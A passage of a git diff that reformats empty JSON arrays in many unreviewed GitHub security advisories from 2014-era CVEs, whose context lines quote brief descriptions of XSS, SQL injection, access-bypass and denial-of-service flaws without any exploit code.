+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-88x2-cfv5-j89g/GHSA-88x2-cfv5-j89g.json b/advisories/unreviewed/2022/05/GHSA-88x2-cfv5-j89g/GHSA-88x2-cfv5-j89g.json
index 98ded615b4e..2fa77803413 100644
--- a/advisories/unreviewed/2022/05/GHSA-88x2-cfv5-j89g/GHSA-88x2-cfv5-j89g.json
+++ b/advisories/unreviewed/2022/05/GHSA-88x2-cfv5-j89g/GHSA-88x2-cfv5-j89g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8f6f-8jcg-wcxv/GHSA-8f6f-8jcg-wcxv.json b/advisories/unreviewed/2022/05/GHSA-8f6f-8jcg-wcxv/GHSA-8f6f-8jcg-wcxv.json
index 431bcef77bb..0f66fdcb24a 100644
--- a/advisories/unreviewed/2022/05/GHSA-8f6f-8jcg-wcxv/GHSA-8f6f-8jcg-wcxv.json
+++ b/advisories/unreviewed/2022/05/GHSA-8f6f-8jcg-wcxv/GHSA-8f6f-8jcg-wcxv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8gm6-93p9-6wff/GHSA-8gm6-93p9-6wff.json b/advisories/unreviewed/2022/05/GHSA-8gm6-93p9-6wff/GHSA-8gm6-93p9-6wff.json
index 1946439619f..fca14ca1c53 100644
--- a/advisories/unreviewed/2022/05/GHSA-8gm6-93p9-6wff/GHSA-8gm6-93p9-6wff.json
+++ b/advisories/unreviewed/2022/05/GHSA-8gm6-93p9-6wff/GHSA-8gm6-93p9-6wff.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8h7g-r6fh-x7wp/GHSA-8h7g-r6fh-x7wp.json b/advisories/unreviewed/2022/05/GHSA-8h7g-r6fh-x7wp/GHSA-8h7g-r6fh-x7wp.json
index b8b6d8669cf..dd6358f14af 100644
--- a/advisories/unreviewed/2022/05/GHSA-8h7g-r6fh-x7wp/GHSA-8h7g-r6fh-x7wp.json
+++ b/advisories/unreviewed/2022/05/GHSA-8h7g-r6fh-x7wp/GHSA-8h7g-r6fh-x7wp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-8hhg-q8jv-q9c7/GHSA-8hhg-q8jv-q9c7.json b/advisories/unreviewed/2022/05/GHSA-8hhg-q8jv-q9c7/GHSA-8hhg-q8jv-q9c7.json
index b0178023dda..108e3ecb207 100644
--- a/advisories/unreviewed/2022/05/GHSA-8hhg-q8jv-q9c7/GHSA-8hhg-q8jv-q9c7.json
+++ b/advisories/unreviewed/2022/05/GHSA-8hhg-q8jv-q9c7/GHSA-8hhg-q8jv-q9c7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8hr8-85qr-jj9x/GHSA-8hr8-85qr-jj9x.json b/advisories/unreviewed/2022/05/GHSA-8hr8-85qr-jj9x/GHSA-8hr8-85qr-jj9x.json
index 000ea743f59..5f85295d6b3 100644
--- a/advisories/unreviewed/2022/05/GHSA-8hr8-85qr-jj9x/GHSA-8hr8-85qr-jj9x.json
+++ b/advisories/unreviewed/2022/05/GHSA-8hr8-85qr-jj9x/GHSA-8hr8-85qr-jj9x.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-8mgg-q44g-rg5j/GHSA-8mgg-q44g-rg5j.json b/advisories/unreviewed/2022/05/GHSA-8mgg-q44g-rg5j/GHSA-8mgg-q44g-rg5j.json
index 7eb64e1724e..d17a5c0a94a 100644
--- a/advisories/unreviewed/2022/05/GHSA-8mgg-q44g-rg5j/GHSA-8mgg-q44g-rg5j.json
+++ b/advisories/unreviewed/2022/05/GHSA-8mgg-q44g-rg5j/GHSA-8mgg-q44g-rg5j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8q44-g323-pv3g/GHSA-8q44-g323-pv3g.json b/advisories/unreviewed/2022/05/GHSA-8q44-g323-pv3g/GHSA-8q44-g323-pv3g.json
index 32745e714e2..9ca3a0e9cae 100644
--- a/advisories/unreviewed/2022/05/GHSA-8q44-g323-pv3g/GHSA-8q44-g323-pv3g.json
+++ b/advisories/unreviewed/2022/05/GHSA-8q44-g323-pv3g/GHSA-8q44-g323-pv3g.json
@@ -7,12 +7,8 @@
"CVE-2014-4908"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in PNP4Nagios through 0.6.22 allow remote attackers to inject arbitrary web script or HTML via the URI used for reaching (1) share/pnp/application/views/kohana_error_page.php or (2) share/pnp/application/views/template.php, leading to improper handling within an http-equiv=\"refresh\" META element.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8q8f-338r-vxhf/GHSA-8q8f-338r-vxhf.json b/advisories/unreviewed/2022/05/GHSA-8q8f-338r-vxhf/GHSA-8q8f-338r-vxhf.json
index 904164a0406..7aa72e2fe43 100644
--- a/advisories/unreviewed/2022/05/GHSA-8q8f-338r-vxhf/GHSA-8q8f-338r-vxhf.json
+++ b/advisories/unreviewed/2022/05/GHSA-8q8f-338r-vxhf/GHSA-8q8f-338r-vxhf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8q8w-v8pg-496j/GHSA-8q8w-v8pg-496j.json b/advisories/unreviewed/2022/05/GHSA-8q8w-v8pg-496j/GHSA-8q8w-v8pg-496j.json
index 978305c5802..1c8fef15db4 100644
--- a/advisories/unreviewed/2022/05/GHSA-8q8w-v8pg-496j/GHSA-8q8w-v8pg-496j.json
+++ b/advisories/unreviewed/2022/05/GHSA-8q8w-v8pg-496j/GHSA-8q8w-v8pg-496j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-8qfh-wm69-q73c/GHSA-8qfh-wm69-q73c.json b/advisories/unreviewed/2022/05/GHSA-8qfh-wm69-q73c/GHSA-8qfh-wm69-q73c.json
index a8803c5fe2c..e7888d64449 100644
--- a/advisories/unreviewed/2022/05/GHSA-8qfh-wm69-q73c/GHSA-8qfh-wm69-q73c.json
+++ b/advisories/unreviewed/2022/05/GHSA-8qfh-wm69-q73c/GHSA-8qfh-wm69-q73c.json
@@ -7,12 +7,8 @@
"CVE-2014-4516"
],
"details": "Cross-site scripting (XSS) vulnerability in bicm-carousel-preview.php in the BIC Media Widget plugin 1.0 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the param parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8r88-mr99-fvr2/GHSA-8r88-mr99-fvr2.json b/advisories/unreviewed/2022/05/GHSA-8r88-mr99-fvr2/GHSA-8r88-mr99-fvr2.json
index 885162a6e2f..6599478dcbb 100644
--- a/advisories/unreviewed/2022/05/GHSA-8r88-mr99-fvr2/GHSA-8r88-mr99-fvr2.json
+++ b/advisories/unreviewed/2022/05/GHSA-8r88-mr99-fvr2/GHSA-8r88-mr99-fvr2.json
@@ -7,12 +7,8 @@
"CVE-2014-3992"
],
"details": "Multiple SQL injection vulnerabilities in Dolibarr ERP/CRM 3.5.3 allow remote authenticated users to execute arbitrary SQL commands via the (1) entity parameter in an update action to user/fiche.php or (2) sortorder parameter to user/group/index.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8v54-wvr5-g36p/GHSA-8v54-wvr5-g36p.json b/advisories/unreviewed/2022/05/GHSA-8v54-wvr5-g36p/GHSA-8v54-wvr5-g36p.json
index 45a8efb8da5..3dbcf290c7d 100644
--- a/advisories/unreviewed/2022/05/GHSA-8v54-wvr5-g36p/GHSA-8v54-wvr5-g36p.json
+++ b/advisories/unreviewed/2022/05/GHSA-8v54-wvr5-g36p/GHSA-8v54-wvr5-g36p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8vw7-3cp3-ph8j/GHSA-8vw7-3cp3-ph8j.json b/advisories/unreviewed/2022/05/GHSA-8vw7-3cp3-ph8j/GHSA-8vw7-3cp3-ph8j.json
index f92198e0c8c..11f60bb5e84 100644
--- a/advisories/unreviewed/2022/05/GHSA-8vw7-3cp3-ph8j/GHSA-8vw7-3cp3-ph8j.json
+++ b/advisories/unreviewed/2022/05/GHSA-8vw7-3cp3-ph8j/GHSA-8vw7-3cp3-ph8j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8w3c-35rq-x96r/GHSA-8w3c-35rq-x96r.json b/advisories/unreviewed/2022/05/GHSA-8w3c-35rq-x96r/GHSA-8w3c-35rq-x96r.json
index 3c029a5f0ec..ec207985c4a 100644
--- a/advisories/unreviewed/2022/05/GHSA-8w3c-35rq-x96r/GHSA-8w3c-35rq-x96r.json
+++ b/advisories/unreviewed/2022/05/GHSA-8w3c-35rq-x96r/GHSA-8w3c-35rq-x96r.json
@@ -7,12 +7,8 @@
"CVE-2014-4584"
],
"details": "Cross-site scripting (XSS) vulnerability in admin/editFacility.php in the wp-easybooking plugin 1.0.3 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the fID parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8wr8-gr7j-v6cg/GHSA-8wr8-gr7j-v6cg.json b/advisories/unreviewed/2022/05/GHSA-8wr8-gr7j-v6cg/GHSA-8wr8-gr7j-v6cg.json
index 2e1b125397d..c982a43be70 100644
--- a/advisories/unreviewed/2022/05/GHSA-8wr8-gr7j-v6cg/GHSA-8wr8-gr7j-v6cg.json
+++ b/advisories/unreviewed/2022/05/GHSA-8wr8-gr7j-v6cg/GHSA-8wr8-gr7j-v6cg.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8x3j-fggj-hxrf/GHSA-8x3j-fggj-hxrf.json b/advisories/unreviewed/2022/05/GHSA-8x3j-fggj-hxrf/GHSA-8x3j-fggj-hxrf.json
index 356881ef474..42ed7b08813 100644
--- a/advisories/unreviewed/2022/05/GHSA-8x3j-fggj-hxrf/GHSA-8x3j-fggj-hxrf.json
+++ b/advisories/unreviewed/2022/05/GHSA-8x3j-fggj-hxrf/GHSA-8x3j-fggj-hxrf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-8x6q-j5q5-748q/GHSA-8x6q-j5q5-748q.json b/advisories/unreviewed/2022/05/GHSA-8x6q-j5q5-748q/GHSA-8x6q-j5q5-748q.json
index f10485f3eca..f1156f544ef 100644
--- a/advisories/unreviewed/2022/05/GHSA-8x6q-j5q5-748q/GHSA-8x6q-j5q5-748q.json
+++ b/advisories/unreviewed/2022/05/GHSA-8x6q-j5q5-748q/GHSA-8x6q-j5q5-748q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-8xpw-m3x3-rq75/GHSA-8xpw-m3x3-rq75.json b/advisories/unreviewed/2022/05/GHSA-8xpw-m3x3-rq75/GHSA-8xpw-m3x3-rq75.json
index 6c0ae10ea99..c35f5a17f30 100644
--- a/advisories/unreviewed/2022/05/GHSA-8xpw-m3x3-rq75/GHSA-8xpw-m3x3-rq75.json
+++ b/advisories/unreviewed/2022/05/GHSA-8xpw-m3x3-rq75/GHSA-8xpw-m3x3-rq75.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-92hc-f3ff-7hwj/GHSA-92hc-f3ff-7hwj.json b/advisories/unreviewed/2022/05/GHSA-92hc-f3ff-7hwj/GHSA-92hc-f3ff-7hwj.json
index cd1f877ce5d..27f1d40c9b6 100644
--- a/advisories/unreviewed/2022/05/GHSA-92hc-f3ff-7hwj/GHSA-92hc-f3ff-7hwj.json
+++ b/advisories/unreviewed/2022/05/GHSA-92hc-f3ff-7hwj/GHSA-92hc-f3ff-7hwj.json
@@ -7,12 +7,8 @@
"CVE-2014-1996"
],
"details": "Cybozu Garoon 3.7 before SP4 allows remote authenticated users to bypass intended access restrictions, and execute arbitrary code or cause a denial of service, via an API call.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-92vm-c2pw-26pj/GHSA-92vm-c2pw-26pj.json b/advisories/unreviewed/2022/05/GHSA-92vm-c2pw-26pj/GHSA-92vm-c2pw-26pj.json
index d6b1626f702..40cbacbe40b 100644
--- a/advisories/unreviewed/2022/05/GHSA-92vm-c2pw-26pj/GHSA-92vm-c2pw-26pj.json
+++ b/advisories/unreviewed/2022/05/GHSA-92vm-c2pw-26pj/GHSA-92vm-c2pw-26pj.json
@@ -7,12 +7,8 @@
"CVE-2014-3890"
],
"details": "silex SX-2000WG devices with firmware before 1.5.4 allow remote attackers to cause a denial of service (connectivity outage) via a crafted IP packet, a different vulnerability than CVE-2014-3889.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-93qw-rcf2-vw95/GHSA-93qw-rcf2-vw95.json b/advisories/unreviewed/2022/05/GHSA-93qw-rcf2-vw95/GHSA-93qw-rcf2-vw95.json
index 00b919e721f..651b4859d8b 100644
--- a/advisories/unreviewed/2022/05/GHSA-93qw-rcf2-vw95/GHSA-93qw-rcf2-vw95.json
+++ b/advisories/unreviewed/2022/05/GHSA-93qw-rcf2-vw95/GHSA-93qw-rcf2-vw95.json
@@ -7,12 +7,8 @@
"CVE-2014-2881"
],
"details": "Unspecified vulnerability in the Diffie-Hellman key agreement implementation in the management GUI Java applet in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway before 9.3-66.5 and 10.x before 10.1-122.17 has unknown impact and vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-94p3-q55j-7qf5/GHSA-94p3-q55j-7qf5.json b/advisories/unreviewed/2022/05/GHSA-94p3-q55j-7qf5/GHSA-94p3-q55j-7qf5.json
index 1ae3a31cc7d..0223e107dcb 100644
--- a/advisories/unreviewed/2022/05/GHSA-94p3-q55j-7qf5/GHSA-94p3-q55j-7qf5.json
+++ b/advisories/unreviewed/2022/05/GHSA-94p3-q55j-7qf5/GHSA-94p3-q55j-7qf5.json
@@ -7,12 +7,8 @@
"CVE-2014-3889"
],
"details": "silex SX-2000WG devices with firmware before 1.5.4 allow remote attackers to cause a denial of service (connectivity outage) via crafted data in the Options field of a TCP header, a different vulnerability than CVE-2014-3890.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-95hr-f33r-v5jc/GHSA-95hr-f33r-v5jc.json b/advisories/unreviewed/2022/05/GHSA-95hr-f33r-v5jc/GHSA-95hr-f33r-v5jc.json
index 5ec05cb80c6..ace430360f7 100644
--- a/advisories/unreviewed/2022/05/GHSA-95hr-f33r-v5jc/GHSA-95hr-f33r-v5jc.json
+++ b/advisories/unreviewed/2022/05/GHSA-95hr-f33r-v5jc/GHSA-95hr-f33r-v5jc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-97f5-m9j7-fpq3/GHSA-97f5-m9j7-fpq3.json b/advisories/unreviewed/2022/05/GHSA-97f5-m9j7-fpq3/GHSA-97f5-m9j7-fpq3.json
index 0a30152e6be..7061081bc40 100644
--- a/advisories/unreviewed/2022/05/GHSA-97f5-m9j7-fpq3/GHSA-97f5-m9j7-fpq3.json
+++ b/advisories/unreviewed/2022/05/GHSA-97f5-m9j7-fpq3/GHSA-97f5-m9j7-fpq3.json
@@ -7,12 +7,8 @@
"CVE-2014-4168"
],
"details": "(1) iodined.c and (2) user.c in iodine before 0.7.0 allows remote attackers to bypass authentication by continuing execution after an error has been triggering.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-97m5-wjh8-vrcx/GHSA-97m5-wjh8-vrcx.json b/advisories/unreviewed/2022/05/GHSA-97m5-wjh8-vrcx/GHSA-97m5-wjh8-vrcx.json
index 80e6c622a12..570e7e11203 100644
--- a/advisories/unreviewed/2022/05/GHSA-97m5-wjh8-vrcx/GHSA-97m5-wjh8-vrcx.json
+++ b/advisories/unreviewed/2022/05/GHSA-97m5-wjh8-vrcx/GHSA-97m5-wjh8-vrcx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-984g-xfmw-m59w/GHSA-984g-xfmw-m59w.json b/advisories/unreviewed/2022/05/GHSA-984g-xfmw-m59w/GHSA-984g-xfmw-m59w.json
index 8a3d8501d7e..a8552eda9c0 100644
--- a/advisories/unreviewed/2022/05/GHSA-984g-xfmw-m59w/GHSA-984g-xfmw-m59w.json
+++ b/advisories/unreviewed/2022/05/GHSA-984g-xfmw-m59w/GHSA-984g-xfmw-m59w.json
@@ -7,12 +7,8 @@
"CVE-2014-1993"
],
"details": "The Portlets subsystem in Cybozu Garoon 2.x and 3.x before 3.7 SP4 allows remote authenticated users to bypass intended access restrictions via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-98vj-jwmr-95pq/GHSA-98vj-jwmr-95pq.json b/advisories/unreviewed/2022/05/GHSA-98vj-jwmr-95pq/GHSA-98vj-jwmr-95pq.json
index 419d7bd1730..e78e04cd13a 100644
--- a/advisories/unreviewed/2022/05/GHSA-98vj-jwmr-95pq/GHSA-98vj-jwmr-95pq.json
+++ b/advisories/unreviewed/2022/05/GHSA-98vj-jwmr-95pq/GHSA-98vj-jwmr-95pq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-992x-4rhv-25qp/GHSA-992x-4rhv-25qp.json b/advisories/unreviewed/2022/05/GHSA-992x-4rhv-25qp/GHSA-992x-4rhv-25qp.json
index cd23766a4c0..38de708e482 100644
--- a/advisories/unreviewed/2022/05/GHSA-992x-4rhv-25qp/GHSA-992x-4rhv-25qp.json
+++ b/advisories/unreviewed/2022/05/GHSA-992x-4rhv-25qp/GHSA-992x-4rhv-25qp.json
@@ -7,12 +7,8 @@
"CVE-2014-2926"
],
"details": "kapfa.sys in Kaseya Virtual System Administrator (VSA) 6.5 before 6.5.0.17 and 7.0 before 7.0.0.16 allows local users to cause a denial of service (NULL pointer dereference and application crash) via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "LOW",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-9cpm-77gg-x323/GHSA-9cpm-77gg-x323.json b/advisories/unreviewed/2022/05/GHSA-9cpm-77gg-x323/GHSA-9cpm-77gg-x323.json
index 6268fc753e9..fb510a68b8d 100644
--- a/advisories/unreviewed/2022/05/GHSA-9cpm-77gg-x323/GHSA-9cpm-77gg-x323.json
+++ b/advisories/unreviewed/2022/05/GHSA-9cpm-77gg-x323/GHSA-9cpm-77gg-x323.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9g49-vh67-7f26/GHSA-9g49-vh67-7f26.json b/advisories/unreviewed/2022/05/GHSA-9g49-vh67-7f26/GHSA-9g49-vh67-7f26.json
index ec4269d54b3..85e0867dba9 100644
--- a/advisories/unreviewed/2022/05/GHSA-9g49-vh67-7f26/GHSA-9g49-vh67-7f26.json
+++ b/advisories/unreviewed/2022/05/GHSA-9g49-vh67-7f26/GHSA-9g49-vh67-7f26.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9h3w-c68r-8xh8/GHSA-9h3w-c68r-8xh8.json b/advisories/unreviewed/2022/05/GHSA-9h3w-c68r-8xh8/GHSA-9h3w-c68r-8xh8.json
index 773306359c5..52974b33f4a 100644
--- a/advisories/unreviewed/2022/05/GHSA-9h3w-c68r-8xh8/GHSA-9h3w-c68r-8xh8.json
+++ b/advisories/unreviewed/2022/05/GHSA-9h3w-c68r-8xh8/GHSA-9h3w-c68r-8xh8.json
@@ -7,12 +7,8 @@
"CVE-2014-4597"
],
"details": "Cross-site scripting (XSS) vulnerability in test.php in the WP Social Invitations plugin before 1.4.4.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xhrurl parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9h8q-9jx4-9q7w/GHSA-9h8q-9jx4-9q7w.json b/advisories/unreviewed/2022/05/GHSA-9h8q-9jx4-9q7w/GHSA-9h8q-9jx4-9q7w.json
index 2dfb15cbd3a..8d645e83d1a 100644
--- a/advisories/unreviewed/2022/05/GHSA-9h8q-9jx4-9q7w/GHSA-9h8q-9jx4-9q7w.json
+++ b/advisories/unreviewed/2022/05/GHSA-9h8q-9jx4-9q7w/GHSA-9h8q-9jx4-9q7w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9j77-653x-h5j3/GHSA-9j77-653x-h5j3.json b/advisories/unreviewed/2022/05/GHSA-9j77-653x-h5j3/GHSA-9j77-653x-h5j3.json
index 51c1f81facf..8424ef2cea0 100644
--- a/advisories/unreviewed/2022/05/GHSA-9j77-653x-h5j3/GHSA-9j77-653x-h5j3.json
+++ b/advisories/unreviewed/2022/05/GHSA-9j77-653x-h5j3/GHSA-9j77-653x-h5j3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-9jr3-q9q2-459g/GHSA-9jr3-q9q2-459g.json b/advisories/unreviewed/2022/05/GHSA-9jr3-q9q2-459g/GHSA-9jr3-q9q2-459g.json
index 2647e1ef43c..74e15a3a160 100644
--- a/advisories/unreviewed/2022/05/GHSA-9jr3-q9q2-459g/GHSA-9jr3-q9q2-459g.json
+++ b/advisories/unreviewed/2022/05/GHSA-9jr3-q9q2-459g/GHSA-9jr3-q9q2-459g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-9m7h-2c84-rqw2/GHSA-9m7h-2c84-rqw2.json b/advisories/unreviewed/2022/05/GHSA-9m7h-2c84-rqw2/GHSA-9m7h-2c84-rqw2.json
index d778c14b7b1..66766cf37e2 100644
--- a/advisories/unreviewed/2022/05/GHSA-9m7h-2c84-rqw2/GHSA-9m7h-2c84-rqw2.json
+++ b/advisories/unreviewed/2022/05/GHSA-9m7h-2c84-rqw2/GHSA-9m7h-2c84-rqw2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
